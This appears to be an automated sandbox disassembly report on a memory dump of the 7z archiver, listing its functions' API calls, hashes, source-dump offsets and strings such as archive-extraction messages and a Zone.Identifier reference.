                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$fputs
                                • String ID: =
                                • API String ID: 2444650769-2525689732
                                • Opcode ID: 6af2d0b8ce2b096ca53b8f6896709cd8d10ae8ae6da6be3d4fe635be2d879f48
                                • Instruction ID: 2b92f72226b81ada54ea39543fcd85646610be761c119152ae975c92eb2b093d
                                • Opcode Fuzzy Hash: 6af2d0b8ce2b096ca53b8f6896709cd8d10ae8ae6da6be3d4fe635be2d879f48
                                • Instruction Fuzzy Hash: 4321E673208A4095CE20EF26E5812AE6720F7D5BE8F445227FF5E43668DF6CC985C709
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                • String ID:
                                • API String ID: 352749199-0
                                • Opcode ID: 3bc03dd1b1b73e9071d32506f7fc1c6f2074b6c84ad5a41d6ab94059779c88a3
                                • Instruction ID: 65512ceac6bd0eec237ffd30477fbbe717dde31d12a44fb6741015695a9334df
                                • Opcode Fuzzy Hash: 3bc03dd1b1b73e9071d32506f7fc1c6f2074b6c84ad5a41d6ab94059779c88a3
                                • Instruction Fuzzy Hash: 35317EB5619B42CADB40DF16E8A435A77A1F780B68F50022AEB6D437B4DF3CD845CB09
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                • String ID:
                                • API String ID: 352749199-0
                                • Opcode ID: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                                • Instruction ID: 1b708162cb0ae972eed9e0b58b790790c1ea066c2fecfcb872aff0aa4402009e
                                • Opcode Fuzzy Hash: 4afe18664bfbb2c87daaaa07b71c9015096e4dbab92b590f771811bd17689861
                                • Instruction Fuzzy Hash: 64212BB5619B42C6EB40DF1AE85434A7361F784BA8F400226EB6D837B4DF3CD846CB09
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                APIs
                                • fputs.MSVCRT ref: 00460D6D
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                Similarity
                                • API ID: fputs$memset
                                • String ID: Extracting archive: $Open$Testing archive:
                                • API String ID: 3543874852-295398807
                                APIs
                                • fputs.MSVCRT ref: 00462AF3
                                • fputs.MSVCRT ref: 00462B03
                                • free.MSVCRT ref: 00462B50
                                  • Part of subcall function 004629A8: fputs.MSVCRT ref: 004629ED
                                  • Part of subcall function 004629A8: fputs.MSVCRT ref: 00462A7B
                                  • Part of subcall function 004629A8: free.MSVCRT ref: 00462AAB
                                Similarity
                                • API ID: fputs$free
                                • String ID: =
                                • API String ID: 3873070119-2525689732
                                APIs
                                • free.MSVCRT ref: 004289D7
                                  • Part of subcall function 004264E8: free.MSVCRT ref: 004265C5
                                  • Part of subcall function 00426E88: GetLastError.KERNEL32 ref: 00426EA3
                                  • Part of subcall function 00426E88: free.MSVCRT ref: 00426EF4
                                  • Part of subcall function 00426E88: free.MSVCRT ref: 00426F2D
                                Similarity
                                • API ID: free$ErrorLast
                                • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                                • API String ID: 408039514-394804653
                                Strings
                                • :Zone.Identifier, xrefs: 004279DD
                                • doc dot wbk docx docm dotx dotm docb wll wwl xls xlt xlm xlsx xlsm xltx xltm xlsb xla xlam ppt pot pps ppa ppam pptx pptm potx potm ppam ppsx ppsm sldx sldm , xrefs: 004279C6
                                • Cannot set length for output file, xrefs: 0042797F
                                Similarity
                                • API ID: free
                                • String ID: doc dot wbk docx docm dotx dotm docb wll wwl xls xlt xlm xlsx xlsm xltx xltm xlsb xla xlam ppt pot pps ppa ppam pptx pptm potx potm ppam ppsx ppsm sldx sldm $:Zone.Identifier$Cannot set length for output file
                                • API String ID: 1294909896-1552544479
                                Similarity
                                • API ID: AttributesFilefree
                                • String ID:
                                • API String ID: 1936811914-0
                                Similarity
                                • API ID: AttributesFilefree
                                • String ID:
                                • API String ID: 1936811914-0
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-0
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                APIs
                                  • Part of subcall function 0041960C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 0041961E
                                • CreateFileW.KERNELBASE ref: 00419B09
                                • CreateFileW.KERNEL32 ref: 00419B5C
                                • free.MSVCRT ref: 00419B6A
                                Similarity
                                • API ID: CreateFile$CloseHandlefree
                                • String ID:
                                • API String ID: 210839660-0
                                APIs
                                  • Part of subcall function 004135B8: memmove.MSVCRT ref: 004135F0
                                • fputs.MSVCRT ref: 004629ED
                                • fputs.MSVCRT ref: 00462A7B
                                • free.MSVCRT ref: 00462AAB
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                Similarity
                                • API ID: fputs$fputcfreememmove
                                • String ID:
                                • API String ID: 1158454270-0
                                APIs
                                • SetFilePointer.KERNELBASE(00000003,00000000,00000000,?,00419BD5), ref: 00419736
                                • GetLastError.KERNEL32 ref: 00419743
                                • SetLastError.KERNEL32 ref: 0041975C
                                Similarity
                                • API ID: ErrorLast$FilePointer
                                • String ID:
                                • API String ID: 1156039329-0
                                APIs
                                Similarity
                                • API ID: free$fputsmemmove
                                • String ID:
                                • API String ID: 4106585527-0
                                APIs
                                Similarity
                                • API ID: free$fputsmemmove
                                • String ID:
                                • API String ID: 4106585527-0
                                APIs
                                Similarity
                                • API ID: ErrorLast$memmove
                                • String ID:
                                • API String ID: 3796167841-0
                                APIs
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                APIs
                                Similarity
                                • API ID: ExceptionThrowfreememmove
                                • String ID:
                                • API String ID: 73398970-0
                                APIs
                                Strings
                                Similarity
                                • API ID: fputc
                                • String ID: Kernel
                                • API String ID: 1992160199-1736990243
                                APIs
                                • memset.MSVCRT ref: 0046B515
                                • fputs.MSVCRT ref: 0046B53A
                                  • Part of subcall function 00412C70: _CxxThrowException.MSVCRT ref: 00412C99
                                  • Part of subcall function 00412C70: free.MSVCRT ref: 00412CB1
                                Similarity
                                • API ID: ExceptionThrowfputsfreememset
                                • String ID:
                                • API String ID: 3104931167-0
                                APIs
                                Similarity
                                • API ID: fputcfputsfree
                                • String ID:
                                • API String ID: 2822829076-0
                                APIs
                                • memmove.MSVCRT ref: 004533B2
                                • memmove.MSVCRT ref: 004533EC
                                  • Part of subcall function 00413798: free.MSVCRT ref: 004137C4
                                  • Part of subcall function 00413798: memmove.MSVCRT ref: 004137DF
                                  • Part of subcall function 00455A44: _CxxThrowException.MSVCRT ref: 00455A74
                                  • Part of subcall function 00455A44: memmove.MSVCRT ref: 00455AAD
                                  • Part of subcall function 00455A44: free.MSVCRT ref: 00455AB5
                                  • Part of subcall function 00412350: malloc.MSVCRT ref: 00412360
                                  • Part of subcall function 00412350: _CxxThrowException.MSVCRT ref: 0041237B
                                Similarity
                                • API ID: memmove$ExceptionThrowfree$malloc
                                • String ID:
                                • API String ID: 459785443-0
                                APIs
                                • memmove.MSVCRT ref: 004533CA
                                • memmove.MSVCRT ref: 004533EC
                                  • Part of subcall function 00413798: free.MSVCRT ref: 004137C4
                                  • Part of subcall function 00413798: memmove.MSVCRT ref: 004137DF
                                  • Part of subcall function 00455A44: _CxxThrowException.MSVCRT ref: 00455A74
                                  • Part of subcall function 00455A44: memmove.MSVCRT ref: 00455AAD
                                  • Part of subcall function 00455A44: free.MSVCRT ref: 00455AB5
                                  • Part of subcall function 00412350: malloc.MSVCRT ref: 00412360
                                  • Part of subcall function 00412350: _CxxThrowException.MSVCRT ref: 0041237B
                                Similarity
                                • API ID: memmove$ExceptionThrowfree$malloc
                                • String ID:
                                • API String ID: 459785443-0
                                APIs
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                APIs
                                • free.MSVCRT ref: 0041376A
                                • memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                Similarity
                                • API ID: freememmove
                                • String ID:
                                • API String ID: 2988784210-0
                                APIs
                                • EnterCriticalSection.KERNEL32 ref: 00460298
                                • LeaveCriticalSection.KERNEL32 ref: 004602CC
                                  • Part of subcall function 0046B774: GetTickCount.KERNEL32 ref: 0046B794
                                  • Part of subcall function 0046B774: strcmp.MSVCRT ref: 0046B7DA
                                  • Part of subcall function 0046B774: wcscmp.MSVCRT ref: 0046B7FA
                                  • Part of subcall function 0046B774: strcmp.MSVCRT ref: 0046B862
                                Similarity
                                • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                                • String ID:
                                • API String ID: 3267814326-0
                                APIs
                                Similarity
                                • API ID: ExceptionThrowmalloc
                                • String ID:
                                • API String ID: 2436765578-0
                                APIs
                                  • Part of subcall function 0041BE6C: VariantClear.OLEAUT32 ref: 0041BE91
                                • free.MSVCRT ref: 0042BBE1
                                Similarity
                                • API ID: ClearVariantfree
                                • String ID:
                                • API String ID: 1064583652-0
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e1cdfd6a4b5c65e5f858a886ff12511c44938c6720d31dbf4f1bc7184a9a63f
                                • Instruction ID: 850ac23a2e650a90feae961613b28849bf46e45b48fe550df966d34eae6fc4af
                                • Opcode Fuzzy Hash: 8e1cdfd6a4b5c65e5f858a886ff12511c44938c6720d31dbf4f1bc7184a9a63f
                                • Instruction Fuzzy Hash: 27512E72306AD495C761CF2AE44029E7B61F785F98F98412BDF8A4B719CF79C881C714
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ByteString
                                • String ID:
                                • API String ID: 4236320881-0
                                • Opcode ID: 2c2e37631b715157dc41e9a515c137241c6488906a9e2a13e0927854e2735fe0
                                • Instruction ID: 187653a1d605142081058dbdf1ec804dda53df73726d3d9212e73a950b7cd255
                                • Opcode Fuzzy Hash: 2c2e37631b715157dc41e9a515c137241c6488906a9e2a13e0927854e2735fe0
                                • Instruction Fuzzy Hash: 00118E2271C78181E3308B19A8407BA6A60E7847A4F448322EFDA477E4EF3CCD878719
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FileTime
                                • String ID:
                                • API String ID: 1425588814-0
                                • Opcode ID: 4a3de73dfb10b1671eec32927cac63c902511c3d15486891ba1e2983bc9e8865
                                • Instruction ID: cff028fa8ab7b3ab32bac89d3378cc0bca7df3ec8732476bb30d43c951a6bee5
                                • Opcode Fuzzy Hash: 4a3de73dfb10b1671eec32927cac63c902511c3d15486891ba1e2983bc9e8865
                                • Instruction Fuzzy Hash: A501DB727042C097D710DB76A51479AFBD1B788BE8F188126EE4887B95D77CC886CB44
                                APIs
                                  • Part of subcall function 004196F8: SetFilePointer.KERNELBASE(00000003,00000000,00000000,?,00419BD5), ref: 00419736
                                  • Part of subcall function 004196F8: GetLastError.KERNEL32 ref: 00419743
                                  • Part of subcall function 004196F8: SetLastError.KERNEL32 ref: 0041975C
                                • SetEndOfFile.KERNELBASE ref: 004199FB
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ErrorFileLast$Pointer
                                • String ID:
                                • API String ID: 1697706070-0
                                • Opcode ID: 7bc861c7b5eb5761a791ea73e4469635d3466af59617cd57f8b57b75ddb733e8
                                • Instruction ID: 57d8389ab1fb04041bbf3001a25d1baf3d4746fb57af631236a0b3a6f4488b76
                                • Opcode Fuzzy Hash: 7bc861c7b5eb5761a791ea73e4469635d3466af59617cd57f8b57b75ddb733e8
                                • Instruction Fuzzy Hash: 46E026723104E0D3E7208FA664A16EAC710AB447E4F984136EE4943B449A6D8CCA8704
                                APIs
                                • GetModuleFileNameW.KERNEL32 ref: 00416C5C
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FileModuleNamefreememmove
                                • String ID:
                                • API String ID: 2942794927-0
                                • Opcode ID: 714446674f8f09c89ca169f9755ed8446007b42cc3d9ca7163880c561210c419
                                • Instruction ID: 238f66a82bc359eaab79b255aaffeb3fd4414053b1316c509349167abb558b03
                                • Opcode Fuzzy Hash: 714446674f8f09c89ca169f9755ed8446007b42cc3d9ca7163880c561210c419
                                • Instruction Fuzzy Hash: E0F09BB131464481EB208F11E45439B6360F749B84F845012DA8D4B394EF7DC699CF99
                                APIs
                                  • Part of subcall function 00416B80: FreeLibrary.KERNELBASE(?,?,?,00416C03), ref: 00416B91
                                • LoadLibraryExW.KERNELBASE ref: 00416C10
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: Library$FreeLoad
                                • String ID:
                                • API String ID: 534179979-0
                                • Opcode ID: ec535dba14579e588a217dbf5588d92892c876ee5900133f57a0fc40d7a99ceb
                                • Instruction ID: 92bd39f3bdb1464c0e057414061671115a931ce44bebdebe466642863584e32e
                                • Opcode Fuzzy Hash: ec535dba14579e588a217dbf5588d92892c876ee5900133f57a0fc40d7a99ceb
                                • Instruction Fuzzy Hash: 95D02E2230222082EB102BA239922AA03059B05BE0F488031CF8D03B00EA2D8CEBA318
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                • API String ID: 3934441357-0
                                • Opcode ID: 2fb2f0fefd54e514cf6a40f39018a395235dd717ad2226923adce02d3f6e3b0a
                                • Instruction ID: 10e0a8bbfd2443a3bd199d0c619583bc6e333c94ef8d1a0c5c0d339e8de8c847
                                • Opcode Fuzzy Hash: 2fb2f0fefd54e514cf6a40f39018a395235dd717ad2226923adce02d3f6e3b0a
                                • Instruction Fuzzy Hash: 62E08C76318640CBE7508F60E40074AB3A0F388B24F004025DE8E83B84DBBDC144CF44
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                • Opcode ID: 83abdbc612d9fe913b19c0aa44b7f33faef9c6a21742b24dbd4aaeadee3cbc7c
                                • Instruction ID: 108e96ffe371ccb8cd866be39a2f1b1efa305b938f87ec1165c5bafe31b36492
                                • Opcode Fuzzy Hash: 83abdbc612d9fe913b19c0aa44b7f33faef9c6a21742b24dbd4aaeadee3cbc7c
                                • Instruction Fuzzy Hash: ACD0C7B2601949C1DF211F7A9C443691355A754F74F1C5315DE744A3D0EF2988D68715
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 1a8169abdd710320b32848016f575c4d8c650cd2f5e1767a783909a1319054dd
                                • Instruction ID: e1facec79e6a031c5f4f69bdf310afc12f946b08c6f3799467ccee66466a33ae
                                • Opcode Fuzzy Hash: 1a8169abdd710320b32848016f575c4d8c650cd2f5e1767a783909a1319054dd
                                • Instruction Fuzzy Hash: 6ED05E76618684CBE7008F60E04575AF764F388B68F480004EF8847778CBBDC199CF00
                                APIs
                                • FreeLibrary.KERNELBASE(?,?,?,00416C03), ref: 00416B91
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 01109f61893c3e25e66fa0dd82789664d5e42eb5731ee3caf0e7fb23f98e379a
                                • Instruction ID: 7a15122c8a48ff5c0bb7e4da33dea3b58cd83d1ecf91ea062d9cf6e72e15a639
                                • Opcode Fuzzy Hash: 01109f61893c3e25e66fa0dd82789664d5e42eb5731ee3caf0e7fb23f98e379a
                                • Instruction Fuzzy Hash: A0D012B271761481FF154FA2A85077623549F58F44F5D5015CE1D8A340EB2DC8D5C714
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID:
                                • API String ID: 1795875747-0
                                • Opcode ID: f25a7451e5a52859bd194d4f45b432362e3ceccafce0c0a7c876b32af1063925
                                • Instruction ID: 4a1fb4901218d988a74f0788e1502ce1bf809ce85c1cf02a222898427bd119a6
                                • Opcode Fuzzy Hash: f25a7451e5a52859bd194d4f45b432362e3ceccafce0c0a7c876b32af1063925
                                • Instruction Fuzzy Hash: 3AD0A7D171470882CE109716D4003592321B788FC8F0440218E4D07714EA2CD1458B04
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: FileTime
                                • String ID:
                                • API String ID: 1425588814-0
                                • Opcode ID: 5e4364cb886039da5450fc3fd998d3b1d61beb249d97927aa7d82ce99975c606
                                • Instruction ID: 8bd34a4ee163b354924662fab93e117e847068577005f0366a57c23548330317
                                • Opcode Fuzzy Hash: 5e4364cb886039da5450fc3fd998d3b1d61beb249d97927aa7d82ce99975c606
                                • Instruction Fuzzy Hash: F0B09220B12440C2CB0C6722A89631C13A07788B15FE14429C60FD5690CE1C84A95700
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 9553adbc2b0cf8556eb9aec2fa57ade0ad41d00013f749b76379d9959dd4e0d3
                                • Instruction ID: 1ce543080f183c426a5d2ef628bd858fa12358364bc031a8525f697014337ef8
                                • Opcode Fuzzy Hash: 9553adbc2b0cf8556eb9aec2fa57ade0ad41d00013f749b76379d9959dd4e0d3
                                • Instruction Fuzzy Hash: AC210B3370425496C724DA1ABC4065BB250F34DBE8F20722AFF5687784DB7CC842CB88
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8cc16c8876d987e3de5e17d18832af4d5879e21422368b64978be7a397600a75
                                • Instruction ID: c2239b2be14fccebb35d1da81da38f97d03a602ae310f3f7f52a55504b96baf7
                                • Opcode Fuzzy Hash: 8cc16c8876d987e3de5e17d18832af4d5879e21422368b64978be7a397600a75
                                • Instruction Fuzzy Hash: C31104BE61D65081DB35CB1A91807EAA391BF107C9F644007EE4B46710D72DE8D2C20E
                                APIs
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CAB1
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CABD
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CAC9
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CAD5
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CADE
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CAE7
                                  • Part of subcall function 0043CA94: free.MSVCRT ref: 0043CAF0
                                • free.MSVCRT ref: 00452C15
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
